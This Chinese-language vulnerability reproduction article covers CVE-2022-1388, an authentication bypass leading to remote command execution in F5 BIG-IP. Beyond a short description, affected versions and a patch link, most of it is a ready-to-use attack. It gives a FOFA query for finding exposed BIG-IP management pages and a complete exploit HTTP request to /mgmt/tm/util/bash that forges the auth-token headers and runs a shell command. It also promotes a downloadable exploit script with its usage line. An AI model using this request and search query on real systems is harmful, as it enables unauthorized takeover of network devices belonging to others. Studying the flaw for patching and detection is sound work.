F5 BIG-IP 存在远程命令执行漏洞(CVE-2022-1388)

F5 BIG-IP 存在远程命令执行漏洞(CVE-2022-1388)

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

1. F5 BIG-IP 简介

微信公众号搜索：南风漏洞复现文库
该文章 南风漏洞复现文库 公众号首发

F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。

2.漏洞描述

F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。 F5 BIG-IP 存在访问控制错误漏洞，攻击者可以通过未公开的请求利用该漏洞绕过 BIG-IP 中的 iControl REST 身份验证来控制受影响的系统。 可造成远程命令执行漏洞

CVE 编号:CVE-2022-1388
CNNVD 编号:CNNVD-202205-2141
CNVD 编号:

3.影响版本

• BIG-IP versions 16.1.0 to 16.1.2 (Patch released)
• BIG-IP versions 15.1.0 to 15.1.5 (Patch released)
• BIG-IP versions 14.1.0 to 14.1.4 (Patch released)
• BIG-IP versions 13.1.0 to 13.1.4 (Patch released)
• BIG-IP versions 12.1.0 to 12.1.6 (End of Support)
• BIG-IP versions 11.6.1 to 11.6.5 (End of Support)
  

4.fofa 查询语句

title=“BIG-IP®- Redirect”

5.漏洞复现

漏洞链接：http://127.0.0.1/mgmt/tm/util/bash
漏洞数据包：

POST /mgmt/tm/util/bash HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive, X-F5-Auth-Token
Cache-Control: max-age=0
X-F5-Auth-Token: vvs
Authorization: Basic YWRtaW46
Content-Length: 44
Content-Type: application/x-www-form-urlencoded

{"command": "run" , "utilCmdArgs": "-c id" }

6.POC&EXP

关注公众号 南风漏洞复现文库 并回复 漏洞复现30 即可获得该 POC 工具下载地址：
用法：
python3 CVE-2022-1388.py -u http://127.0.0.1:8080

7.整改意见

目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://support.f5.com/csp/article/K23605346

8.往期回顾